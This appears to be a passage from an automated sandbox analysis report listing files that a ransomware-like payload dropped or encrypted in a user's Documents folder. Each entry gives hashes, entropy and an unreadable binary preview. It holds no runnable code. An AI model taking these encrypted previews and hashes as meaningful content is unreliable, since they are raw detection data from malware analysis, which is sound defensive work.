                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.839776926915898
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:sBIXO5dnBABVnODHilsl4MDbriWHXyJJS/WLEeEDgqBbaUyJ6T2bD:iIenBuOziu4MDnjiJ68qlaUyJrD
                                                                                                                                                                      MD5:539DE05DBC161DF2447ACD5299A73AF0
                                                                                                                                                                      SHA1:5F5436CF00A5715860D8BF3E1D89FDB65AA4BD47
                                                                                                                                                                      SHA-256:AF7D27D1F256EA8CA7D6D0D47D070DE488BF08D348ECCD1BD49D5FF4F3024D28
                                                                                                                                                                      SHA-512:500A73B9FDEC8CA42829B99495D623DFE4EC01FE041C39DAE916CF8C3DA34DF4E747A23CCD1332BB6DABC697E155414A4E501EF908B65B53310F8E208CE11E12
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:VLZDG......u..;.iC....x...?.k.C.....2x....9#.x.n..r.}.W...S9@......HT.9N.. .;...p..._.4N.z..^.....{...A[Ktl.....K.[#..*.vej...Cv.c..I`K.L...M.s.y.vc..W.E\.re.l9v.U.`.X3.4.2..[..St;u....I...1..{.......N..e.&]R..I.S{....\..M.5..x....v1Q.......i(:`.].)....g.............i....f..t.~;..!.~$..l.D.pbY`6.%....,.[........DS....q6........ x'P...[.p]F...|.R<-....J.L....=....<..[..?FF._`bi5.......oi.-.b.#`uFI....!..%..vV...I.od.n.k.+_.T..Q.....d....)o........G..5...........g...R.8.}..W.rjS...n.a9.c..........c.Xj.'yUR.(.M./...?...Z.O{.....$..j0..c.W.....GaML..?A.....=..V^..H..q...8...\.l=7....,..I:.X.'.L..0......h.T...M.{..q.f' .r..x..a...uj....$.u'.U..*.........R5:..*.Sg%l.....H......b.......9Ra}=s..g..vO.i....E...$.P..7.#...S..moA..B...... 7..P7....0!.........[.......>q;%.xrre.>.*.z..}...m..B.K.,......*;...y.(J..J..G.TE.......c.^.........Q....v.q...O.g....<...@...7.c.."(...c.Ey@}......lW......o.....\.i.p.: Us..XP2...,...K._.}.&D:..+.^..K.:..L.`.M..[<..3.?\u.....

                                                                                                                                                                      C:\Users\user\Documents\VLZDGUKUTZ.pdf.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.839776926915898
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:sBIXO5dnBABVnODHilsl4MDbriWHXyJJS/WLEeEDgqBbaUyJ6T2bD:iIenBuOziu4MDnjiJ68qlaUyJrD
                                                                                                                                                                      MD5:539DE05DBC161DF2447ACD5299A73AF0
                                                                                                                                                                      SHA1:5F5436CF00A5715860D8BF3E1D89FDB65AA4BD47
                                                                                                                                                                      SHA-256:AF7D27D1F256EA8CA7D6D0D47D070DE488BF08D348ECCD1BD49D5FF4F3024D28
                                                                                                                                                                      SHA-512:500A73B9FDEC8CA42829B99495D623DFE4EC01FE041C39DAE916CF8C3DA34DF4E747A23CCD1332BB6DABC697E155414A4E501EF908B65B53310F8E208CE11E12
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:VLZDG......u..;.iC....x...?.k.C.....2x....9#.x.n..r.}.W...S9@......HT.9N.. .;...p..._.4N.z..^.....{...A[Ktl.....K.[#..*.vej...Cv.c..I`K.L...M.s.y.vc..W.E\.re.l9v.U.`.X3.4.2..[..St;u....I...1..{.......N..e.&]R..I.S{....\..M.5..x....v1Q.......i(:`.].)....g.............i....f..t.~;..!.~$..l.D.pbY`6.%....,.[........DS....q6........ x'P...[.p]F...|.R<-....J.L....=....<..[..?FF._`bi5.......oi.-.b.#`uFI....!..%..vV...I.od.n.k.+_.T..Q.....d....)o........G..5...........g...R.8.}..W.rjS...n.a9.c..........c.Xj.'yUR.(.M./...?...Z.O{.....$..j0..c.W.....GaML..?A.....=..V^..H..q...8...\.l=7....,..I:.X.'.L..0......h.T...M.{..q.f' .r..x..a...uj....$.u'.U..*.........R5:..*.Sg%l.....H......b.......9Ra}=s..g..vO.i....E...$.P..7.#...S..moA..B...... 7..P7....0!.........[.......>q;%.xrre.>.*.z..}...m..B.K.,......*;...y.(J..J..G.TE.......c.^.........Q....v.q...O.g....<...@...7.c.."(...c.Ey@}......lW......o.....\.i.p.: Us..XP2...,...K._.}.&D:..+.^..K.:..L.`.M..[<..3.?\u.....

                                                                                                                                                                      C:\Users\user\Documents\VLZDGUKUTZ\HTAGVDFUIE.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.857902700107249
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ie1Q80jwdTTRNd3s8KYLDm8+Fgehp0Mo86X3AhJ/ST1j+GcLZD2bD:vVDdTT5c8KLHpxotwhJ/EgGqwD
                                                                                                                                                                      MD5:CBA222D2CFA755373E20F82FA4071D13
                                                                                                                                                                      SHA1:2EACAD7AC930099009A60066780B1E15D58BA090
                                                                                                                                                                      SHA-256:A74E397324B257270D43780390281580983145171BFB35885B199DEE9652A992
                                                                                                                                                                      SHA-512:A75396E5D188A50B817537A131730A25E29995060314E3BCE5C1098E8C9D1B173B70E065E020E0A1314E3180D268817B7AEE125AC495BC59503630ABD01AA04F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:HTAGV...r.....%o3.-]L.=..wq..<;.nb.....n....lP73!l..h0.a.....'y..b.f........0..rIW...z/|{B....8.p...y..C%,..d..@.F..W<..d...>27.......HD....4.,......`.Y.1X..Ys.y...W?c..7....?NI..z.p1....N...X.r.+.X.....@.bQQ..O..m.....*W.F........|@..U..4...g..r..-..~....Q,<...H<%'.......*...4.......Y.!>=.._v.Z(..I^...2.(.......%.r:...o...M..e.$.-..a:.8..;,....5.`w0...aF.ix}...6...#^mtz). ....(.K|../@x.i....&x....d..6...s.G....|\...%..{...!2..Y>_....{.^..h..H...k'm.@i.`.s.(...Z..#,.A3.F...!..A.M...)Y.h....7.&OHO...nXC...h...Q?..LL5/C.X...7..K^*.rJ.).1.{./.+OG...7.........F...s.).)].^+..vb..U ....}...8j..J..~...o$.]..0v..h.;......k...F..;d.!u.......V...(.`:].. .[c...v_Zm...%U_.D...K..Y.~.K~.$..['6.....uXbxT.F.s0.Cx...w....q........q...{.u......8=.\...v..v?!dt....F..j....-.c.....^.....l..@on...v..m+.4.H.........5..3...I.~..~.....h......r>......!.('.{...ZR[tc. 6m...*...rs?.9.........v..P<".B.E..'b....'6W...m.a.........:I.............6a.E.s......W...:.ye.*...(.7

                                                                                                                                                                      C:\Users\user\Documents\VLZDGUKUTZ\HTAGVDFUIE.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.857902700107249
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ie1Q80jwdTTRNd3s8KYLDm8+Fgehp0Mo86X3AhJ/ST1j+GcLZD2bD:vVDdTT5c8KLHpxotwhJ/EgGqwD
                                                                                                                                                                      MD5:CBA222D2CFA755373E20F82FA4071D13
                                                                                                                                                                      SHA1:2EACAD7AC930099009A60066780B1E15D58BA090
                                                                                                                                                                      SHA-256:A74E397324B257270D43780390281580983145171BFB35885B199DEE9652A992
                                                                                                                                                                      SHA-512:A75396E5D188A50B817537A131730A25E29995060314E3BCE5C1098E8C9D1B173B70E065E020E0A1314E3180D268817B7AEE125AC495BC59503630ABD01AA04F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:HTAGV...r.....%o3.-]L.=..wq..<;.nb.....n....lP73!l..h0.a.....'y..b.f........0..rIW...z/|{B....8.p...y..C%,..d..@.F..W<..d...>27.......HD....4.,......`.Y.1X..Ys.y...W?c..7....?NI..z.p1....N...X.r.+.X.....@.bQQ..O..m.....*W.F........|@..U..4...g..r..-..~....Q,<...H<%'.......*...4.......Y.!>=.._v.Z(..I^...2.(.......%.r:...o...M..e.$.-..a:.8..;,....5.`w0...aF.ix}...6...#^mtz). ....(.K|../@x.i....&x....d..6...s.G....|\...%..{...!2..Y>_....{.^..h..H...k'm.@i.`.s.(...Z..#,.A3.F...!..A.M...)Y.h....7.&OHO...nXC...h...Q?..LL5/C.X...7..K^*.rJ.).1.{./.+OG...7.........F...s.).)].^+..vb..U ....}...8j..J..~...o$.]..0v..h.;......k...F..;d.!u.......V...(.`:].. .[c...v_Zm...%U_.D...K..Y.~.K~.$..['6.....uXbxT.F.s0.Cx...w....q........q...{.u......8=.\...v..v?!dt....F..j....-.c.....^.....l..@on...v..m+.4.H.........5..3...I.~..~.....h......r>......!.('.{...ZR[tc. 6m...*...rs?.9.........v..P<".B.E..'b....'6W...m.a.........:I.............6a.E.s......W...:.ye.*...(.7

                                                                                                                                                                      C:\Users\user\Documents\VLZDGUKUTZ\NIKHQAIQAU.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8344916329342915
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:2s//4LTSDLaXOmp6cXSUkSQ7WWLZyNirdvW7muh6h1Xmiumr+DDvsnaz+Wh2bD:J/QSDLoH/SUkSzMkwrdvW7muIh1X5ueN
                                                                                                                                                                      MD5:191B619AEC2E33B8535981347CCE4184
                                                                                                                                                                      SHA1:4148239CA8834CA724BA2B72F13D69F6D0C74337
                                                                                                                                                                      SHA-256:13DDA379814FC907952CA7203ACFBFC0A9C4E2A58DB3D5347931A91F828A36D2
                                                                                                                                                                      SHA-512:6E6D91C9A244194AF2EA1DFE1EE77B5E2BC9432440D0E1548A3D30E85304723528AE377B18F9F47E7FBD756505411F7308981E43AA67976C36D4B32C1B70A255
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:NIKHQ.c..>k..[.Y.g.......(.;.O.f7..........z*..1p....J~.3..:...Dc*....1<.W.....O.4.&>$.{.\>...1Y....S.6S..Y..U.Tg...p.p.@.....R#..W.S........4.W..S.&Y....@n.....O.B....#t*.j..V9S ....d.M...5.Q'...2...k..,.....0.3.:.E...#...do..}..H.dTf...b.fz,$.s}^.+.C.7..d.+c#...|...lW...[N.qb.j..a.?.yV8.....@SO79.u.(0A..A..-......3.A.........h.V...Lq...f.}...............j..+........`..#h^......q;..l.3.r.e.s..r....K..].Q0..v...._.Y..hw.#..-s..*...4.2.7s.K4.4p...G.,.u......U..;,n...%.$.v.=7=....y.....5...J.V.E....xa.VZ4....2....2a.v.\...H.}...1G..!g.........s...ypd.(.=8.w.o..|..{5~u.#......Q[,[..u.k.o... .N.1.LL.S.G^.......w....L..+t.....?..'.N}..1...MA..S.E!o..S-E%y.sC.J.s.q{....F.Oa.N.A..1......{.ZZf..,y.)3*.. .%....J.hM....j)z..xG@a....i......m..}..{......"...R....w....9..P}.=.(/..{..]..'....<X.....o...,...m....' j)...,.Zv.DQ..m...f.M........z. .3x\.../....."2&s..Bdg........}...6K\.....d........t..%.F.a.K.h..).D.}$...0.s....{.....^.S.20..If.j.j.d.P..vPF..

                                                                                                                                                                      C:\Users\user\Documents\VLZDGUKUTZ\NIKHQAIQAU.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8344916329342915
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:2s//4LTSDLaXOmp6cXSUkSQ7WWLZyNirdvW7muh6h1Xmiumr+DDvsnaz+Wh2bD:J/QSDLoH/SUkSzMkwrdvW7muIh1X5ueN
                                                                                                                                                                      MD5:191B619AEC2E33B8535981347CCE4184
                                                                                                                                                                      SHA1:4148239CA8834CA724BA2B72F13D69F6D0C74337
                                                                                                                                                                      SHA-256:13DDA379814FC907952CA7203ACFBFC0A9C4E2A58DB3D5347931A91F828A36D2
                                                                                                                                                                      SHA-512:6E6D91C9A244194AF2EA1DFE1EE77B5E2BC9432440D0E1548A3D30E85304723528AE377B18F9F47E7FBD756505411F7308981E43AA67976C36D4B32C1B70A255
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:NIKHQ.c..>k..[.Y.g.......(.;.O.f7..........z*..1p....J~.3..:...Dc*....1<.W.....O.4.&>$.{.\>...1Y....S.6S..Y..U.Tg...p.p.@.....R#..W.S........4.W..S.&Y....@n.....O.B....#t*.j..V9S ....d.M...5.Q'...2...k..,.....0.3.:.E...#...do..}..H.dTf...b.fz,$.s}^.+.C.7..d.+c#...|...lW...[N.qb.j..a.?.yV8.....@SO79.u.(0A..A..-......3.A.........h.V...Lq...f.}...............j..+........`..#h^......q;..l.3.r.e.s..r....K..].Q0..v...._.Y..hw.#..-s..*...4.2.7s.K4.4p...G.,.u......U..;,n...%.$.v.=7=....y.....5...J.V.E....xa.VZ4....2....2a.v.\...H.}...1G..!g.........s...ypd.(.=8.w.o..|..{5~u.#......Q[,[..u.k.o... .N.1.LL.S.G^.......w....L..+t.....?..'.N}..1...MA..S.E!o..S-E%y.sC.J.s.q{....F.Oa.N.A..1......{.ZZf..,y.)3*.. .%....J.hM....j)z..xG@a....i......m..}..{......"...R....w....9..P}.=.(/..{..]..'....<X.....o...,...m....' j)...,.Zv.DQ..m...f.M........z. .3x\.../....."2&s..Bdg........}...6K\.....d........t..%.F.a.K.h..).D.}$...0.s....{.....^.S.20..If.j.j.d.P..vPF..

                                                                                                                                                                      C:\Users\user\Documents\VLZDGUKUTZ\VLZDGUKUTZ.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.839168775248295
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:SRO92QrHWWDi6Cf6gtifMzLcRIuTE0o9otmkbJ0Tu1Iu/Co7D88+yD7e2bD:xXH46E5tEMEpQ01bJ//Co7os9D
                                                                                                                                                                      MD5:8A724EE40BE94EB59F9B006DC53D1E5C
                                                                                                                                                                      SHA1:352C1D3A3A23F063720C990516A3D93E588B40A5
                                                                                                                                                                      SHA-256:63F74612463FA96C980E08DBD36B300C8064AA7576BDBEFF175A5CDBBB22A270
                                                                                                                                                                      SHA-512:897BF07272BB8C253637869CD3B3697D4EB32B5E61CD9445094C4441CA750FB64198F134A406821CD1B8DD43EE497917A155A36E7DE649879B62E33E1F04E56C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:VLZDG....9tkg>.@........S.....i......+...5..\....;3.;IfN91[.r=...,.-...Z[..HG............s... `....[...9.C..7_.G./L.',Bu=.@.zb.)....4m .Y._?...k...q-...M..}...q.T..v.h..I..~..9.{.H.C.qZ...R[#+.(..c.Q.P......I..2..{Jh.. O.m@.......J...cG.......h..B5:._.DK|.......GG.8.~TC......&.D>|].......mR.`.....I}...w.*3...m...7Ae..@('b4kC..5z.?..f..*|(B.N...C..D.\..S..>.t..P.i.h.V......>...4..G.gt.@..B..........^@W...........4y.....:K.=#.L.H....Cj9h.,.%P....l.._...[.w....}.?c.......B'..&{..s\c\&.._...g.5..g..6..R_\...e.f@=..T...5...E....O;'...\O..>}:).g..IS.....i.z...f9..E..5K..f...x}...../.y..,....[*L.....PS.JX.-..7..}.Hw.....1..s].b.'.$.W.n.c..O.4...................}...W.i!P.DE.._2-.......$;.N.[....j.~.'..[.Q.n.z..H..[e.Y.).$^..N!n...4Tp.. {..........q.1.......W.......wF.)..(..H........U.....b....~Xx.k.C....s..(].>7..........G$.F...+.0.....=.p.^.....s.H...@B,H.....C........'f....Kf..%...~Y.T>.{.n....d.3...@.YK7zU.*...|0+._.:."I....wH/..

                                                                                                                                                                      C:\Users\user\Documents\VLZDGUKUTZ\VLZDGUKUTZ.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.839168775248295
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:SRO92QrHWWDi6Cf6gtifMzLcRIuTE0o9otmkbJ0Tu1Iu/Co7D88+yD7e2bD:xXH46E5tEMEpQ01bJ//Co7os9D
                                                                                                                                                                      MD5:8A724EE40BE94EB59F9B006DC53D1E5C
                                                                                                                                                                      SHA1:352C1D3A3A23F063720C990516A3D93E588B40A5
                                                                                                                                                                      SHA-256:63F74612463FA96C980E08DBD36B300C8064AA7576BDBEFF175A5CDBBB22A270
                                                                                                                                                                      SHA-512:897BF07272BB8C253637869CD3B3697D4EB32B5E61CD9445094C4441CA750FB64198F134A406821CD1B8DD43EE497917A155A36E7DE649879B62E33E1F04E56C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:VLZDG....9tkg>.@........S.....i......+...5..\....;3.;IfN91[.r=...,.-...Z[..HG............s... `....[...9.C..7_.G./L.',Bu=.@.zb.)....4m .Y._?...k...q-...M..}...q.T..v.h..I..~..9.{.H.C.qZ...R[#+.(..c.Q.P......I..2..{Jh.. O.m@.......J...cG.......h..B5:._.DK|.......GG.8.~TC......&.D>|].......mR.`.....I}...w.*3...m...7Ae..@('b4kC..5z.?..f..*|(B.N...C..D.\..S..>.t..P.i.h.V......>...4..G.gt.@..B..........^@W...........4y.....:K.=#.L.H....Cj9h.,.%P....l.._...[.w....}.?c.......B'..&{..s\c\&.._...g.5..g..6..R_\...e.f@=..T...5...E....O;'...\O..>}:).g..IS.....i.z...f9..E..5K..f...x}...../.y..,....[*L.....PS.JX.-..7..}.Hw.....1..s].b.'.$.W.n.c..O.4...................}...W.i!P.DE.._2-.......$;.N.[....j.~.'..[.Q.n.z..H..[e.Y.).$^..N!n...4Tp.. {..........q.1.......W.......wF.)..(..H........U.....b....~Xx.k.C....s..(].>7..........G$.F...+.0.....=.p.^.....s.H...@B,H.....C........'f....Kf..%...~Y.T>.{.n....d.3...@.YK7zU.*...|0+._.:."I....wH/..

                                                                                                                                                                      C:\Users\user\Documents\XZXHAVGRAG\KATAXZVCPS.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.859979364352113
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:bn46vOtDRx3sLBE0Fkset/71IEAPMrAvTvbT/ZxFz/UI7hZp231x7mbs4M42bD:b1OtDR6FEF7F71IfAAvTHZxZ/Uow4MrD
                                                                                                                                                                      MD5:0EEE9A7076AC13593214EB4575A99140
                                                                                                                                                                      SHA1:D8A9A66102D3AEF63A27BA4CB6D96A5D3062C7A8
                                                                                                                                                                      SHA-256:9E5647C8AD935A761C4E860E4BF3C551C4B2F4AF6685FD93ADFB9F58DD2639A2
                                                                                                                                                                      SHA-512:3399F871556BEC193EE9C4BCFCADAD44C52570C4451A55AABE9C05B324FFE9931221FEB5FDE95C8CD92847399565E8C3A64A350B37AE82DFBC0EB9DD180170EF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KATAX.........J......1..x.........p.Y.m.....-.....$.y....#....gfV4..g........0............V..:..,...gq3."..8..oo....G.....L.j...).v.......n.]\.6<..........^....l...NZ..u......d...T/.}0....C9....k.....K....<.u..jugt...mv.NXW..4.g.Q....@...i...I".T.9.1.`....h.E._...ws.l.q...Z....I.U.?.2Dl%-.C.'....x..=. ..LT~..xV9i.d...|.I......a@..j<....BW.~l.....i..P(".NyI.p%7urx.....U0.fn%....A".... .ls...J.N..R....P....0vt3f.....#I..s.b5..8..6.2.J.OH[...],...=.e.Q=m..=Vx}..$.*m..%*.....YO..^.....O.j.3...H...T~....u.....7h.`Lc`{&.k.skf.s..c....-..... a.H..3..O...v.P.. .Z......r&.......'.U.h..f]HT....U........8.V.eD.|...y..\......q..U...(5.W.......9#m.."5....3o-R..0|.....n.?..,.1..Iq....w..Zv......b:!.........V..|.~M..k...;...L. .V....@4S.....BF...n....~.%...\..D._.c.2g..(..$.H.....I..>*.Z.....K.t.wm.X.}a(Z...\.O...T.f...8.I...1.e.9.".UH.e.J.....7J.:....p{...1....8@q.,.I._l/)&...<.KH(|.=...h.O.sO....;.hA'....'t.?w.....f.7]`..].Q.O;n.......i'..>.1....

                                                                                                                                                                      C:\Users\user\Documents\XZXHAVGRAG\KATAXZVCPS.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.859979364352113
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:bn46vOtDRx3sLBE0Fkset/71IEAPMrAvTvbT/ZxFz/UI7hZp231x7mbs4M42bD:b1OtDR6FEF7F71IfAAvTHZxZ/Uow4MrD
                                                                                                                                                                      MD5:0EEE9A7076AC13593214EB4575A99140
                                                                                                                                                                      SHA1:D8A9A66102D3AEF63A27BA4CB6D96A5D3062C7A8
                                                                                                                                                                      SHA-256:9E5647C8AD935A761C4E860E4BF3C551C4B2F4AF6685FD93ADFB9F58DD2639A2
                                                                                                                                                                      SHA-512:3399F871556BEC193EE9C4BCFCADAD44C52570C4451A55AABE9C05B324FFE9931221FEB5FDE95C8CD92847399565E8C3A64A350B37AE82DFBC0EB9DD180170EF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KATAX.........J......1..x.........p.Y.m.....-.....$.y....#....gfV4..g........0............V..:..,...gq3."..8..oo....G.....L.j...).v.......n.]\.6<..........^....l...NZ..u......d...T/.}0....C9....k.....K....<.u..jugt...mv.NXW..4.g.Q....@...i...I".T.9.1.`....h.E._...ws.l.q...Z....I.U.?.2Dl%-.C.'....x..=. ..LT~..xV9i.d...|.I......a@..j<....BW.~l.....i..P(".NyI.p%7urx.....U0.fn%....A".... .ls...J.N..R....P....0vt3f.....#I..s.b5..8..6.2.J.OH[...],...=.e.Q=m..=Vx}..$.*m..%*.....YO..^.....O.j.3...H...T~....u.....7h.`Lc`{&.k.skf.s..c....-..... a.H..3..O...v.P.. .Z......r&.......'.U.h..f]HT....U........8.V.eD.|...y..\......q..U...(5.W.......9#m.."5....3o-R..0|.....n.?..,.1..Iq....w..Zv......b:!.........V..|.~M..k...;...L. .V....@4S.....BF...n....~.%...\..D._.c.2g..(..$.H.....I..>*.Z.....K.t.wm.X.}a(Z...\.O...T.f...8.I...1.e.9.".UH.e.J.....7J.:....p{...1....8@q.,.I._l/)&...<.KH(|.=...h.O.sO....;.hA'....'t.?w.....f.7]`..].Q.O;n.......i'..>.1....

                                                                                                                                                                      C:\Users\user\Documents\XZXHAVGRAG\UMMBDNEQBN.jpg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.869310619954907
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Q/akQBmpypGZfFHq6+i8Uz/PgvJO5DxkmJWYfFHOeBCQUxdXsgcsrZZrHL4Z2bD:kDQGypGz78sPqUN9JvF/1ydXsgFrHnD
                                                                                                                                                                      MD5:19FF06BFB8D774F5BE49504AB124A5AC
                                                                                                                                                                      SHA1:C107CAD834998AAC84C8B3268F2ACBD582F559AA
                                                                                                                                                                      SHA-256:84D03128EF8E451C1D805DA3EC31E69C0AD6BB074CBD87700D3D69BFD782FFA7
                                                                                                                                                                      SHA-512:F83E82E8FB7D3A366A5AB4C5C978768D21895ECAE46C344FD85FECE9570FB2EA7A36755D757E57BA537746FCB3D220963913FBF1EDB518A790696ADCADDC6423
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD................Ee..>S..1g.p..lm..B..&....Q.cNA..|....{oM.[...U.1.....t..D.Kf.V..0K..2.+.$"....r....Xy3J>>?&....M9......eV... ...W...h.a.[B\.I{n-.-j...6.!.l..Dq.....f..........Uf....et...Ow......gy..e}E....U..Tcc... ...4..e.....5%......d7...[{.i....F.`.D.5_.NX..a.e..L=......8"<.z.s.!.8X..&s..1.2.A:..6..Ko............z.......#.(n...........#......... ..t.F..]0.S....'0&..D.........}.6.En......U...(c.n]1I..D.k~..".......x....|34..`n.4=.NSm.......&'Aw*=........D.VW...%?+..U.}...X..3.yt.......S..e.>V....K.7C..t....c...........E.c..q.E.dI_.g..)...H@.....,aB....H..p.7@.......{............?Q...(..y...@...p%.l.8Qp...wt5.......k./cO.G..2.J..v.....gB.D.T..8.P..".9..k=!a./.....t....O./...)5.J...en!`-...|9P.T.67..4.....;..e..WG.G..N..<`...R..[....IW}....q..K.....B.:...Z..;......*.2k..3............a...y.q...VJ[.....L....0...s.......e....7z...4k...... .~.O.....Y....KV?."...0.W"~...>..H@...\5..i.2.L.O..O.m..f.......|.V3..(.%......\..Y...k...'Y.w.[..b.t..p

                                                                                                                                                                      C:\Users\user\Documents\XZXHAVGRAG\UMMBDNEQBN.jpg.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.869310619954907
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Q/akQBmpypGZfFHq6+i8Uz/PgvJO5DxkmJWYfFHOeBCQUxdXsgcsrZZrHL4Z2bD:kDQGypGz78sPqUN9JvF/1ydXsgFrHnD
                                                                                                                                                                      MD5:19FF06BFB8D774F5BE49504AB124A5AC
                                                                                                                                                                      SHA1:C107CAD834998AAC84C8B3268F2ACBD582F559AA
                                                                                                                                                                      SHA-256:84D03128EF8E451C1D805DA3EC31E69C0AD6BB074CBD87700D3D69BFD782FFA7
                                                                                                                                                                      SHA-512:F83E82E8FB7D3A366A5AB4C5C978768D21895ECAE46C344FD85FECE9570FB2EA7A36755D757E57BA537746FCB3D220963913FBF1EDB518A790696ADCADDC6423
                                                                                                                                                                      Malicious:false
